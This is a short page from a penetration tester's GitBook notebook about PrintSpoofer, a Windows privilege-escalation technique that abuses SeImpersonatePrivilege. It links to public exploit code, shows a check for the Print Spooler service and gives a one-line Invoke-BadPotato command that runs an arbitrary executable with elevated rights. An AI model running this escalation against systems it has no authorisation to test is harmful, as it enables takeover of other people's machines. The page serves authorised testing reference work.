Pentester's Promiscuous Notebook
search
Ctrlk
TwitterGitHubBlog
  • README
  • ⚒️Pentest
    • C2chevron-right
    • Infrastructurechevron-right
      • ADchevron-right
        • ACL Abuse
        • AD CS Abusechevron-right
        • ADIDNS Abuse
        • Attack Trusts
        • Attack RODCs
        • AV / EDR Evasionchevron-right
        • Authentication Coercion
        • Credentials Harvestingchevron-right
        • Discovery
        • DnsAdmins
        • Dominance
        • gMSA / dMSA
        • GPO Abuse
        • Kerberoschevron-right
        • Key Credentials Abuse
        • LAPS
        • Lateral Movementchevron-right
        • LDAP
        • NTLMchevron-right
        • Password Spraying
        • Post Exploitation
        • Pre-created Computers Abuse
        • PrivExchange
        • Privileges Abusechevron-right
          • SeBackupPrivilege & SeRestorePrivilege
          • SeImpersonatePrivilegechevron-right
            • Potatoes
            • PrintSpoofer
          • SeTrustedCredmanAccess
        • RID Cycling
        • SCCM Abuse
        • SMB
        • Token Manipulation
        • User Hunt
        • WSUS
        • Zerologon
      • Azure ADchevron-right
      • DevOpschevron-right
      • DBMSchevron-right
      • Authentication Brute Force
      • File Transfer
      • IPMI
      • Kiosk Breakout
      • Low-Hanging Fruits
      • LPE
      • Networkschevron-right
      • NFS
      • Persistence
      • Pivoting
      • Post Exploitation
      • SNMP
      • SSH
      • TFTP
      • VNC
    • OSINTchevron-right
    • Password Brute Forcechevron-right
    • Perimeterchevron-right
    • Shellschevron-right
    • Webchevron-right
    • Wi-Fichevron-right
  • ⚔️Red Team
    • Basics
    • Infrastructure
    • Developmentchevron-right
  • 🐞Exploit Dev
    • BOFchevron-right
    • RE
    • WinDbg
  • ⚙️Admin
    • Git
    • Linuxchevron-right
    • Networkingchevron-right
    • Virtualizationchevron-right
    • Windows
gitbookPowered by GitBook
block-quoteOn this pagechevron-down
  1. ⚒️Pentestchevron-right
  2. Infrastructurechevron-right
  3. ADchevron-right
  4. Privileges Abusechevron-right
  5. SeImpersonatePrivilege

PrintSpoofer

  • https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/arrow-up-right

  • https://github.com/itm4n/PrintSpooferarrow-up-right

  • https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-BadPotato.ps1arrow-up-right

Check if Print Spooler service is running:

PS > Get-Service Spooler

Status   Name               DisplayName
------   ----               -----------
Running  Spooler            Print Spooler

Exploit:

PS > . .\Invoke-BadPotato.ps1; Invoke-BadPotato -C "C:\Users\snovvcrash\music\pwn.exe"

hashtag
C# Implementation

  • https://github.com/itm4n/PrintSpoofer/blob/master/PrintSpoofer/PrintSpoofer.cpparrow-up-right

  • https://github.com/S3cur3Th1sSh1t/NamedPipePTH/blob/main/Resources/PipeServerImpersonate/PipeServer.cpparrow-up-right

  • https://github.com/S3cur3Th1sSh1t/SharpNamedPipePTH/blob/16f8f7a90a543a0f5a3f70d3d02e8f120273e6ed/SharpNamedPipePTH/PipeServerImpersonate.csarrow-up-right

  • https://github.com/chvancooten/OSEP-Code-Snippets/tree/main/PrintSpoofer.NETarrow-up-right

Last updated 3 months ago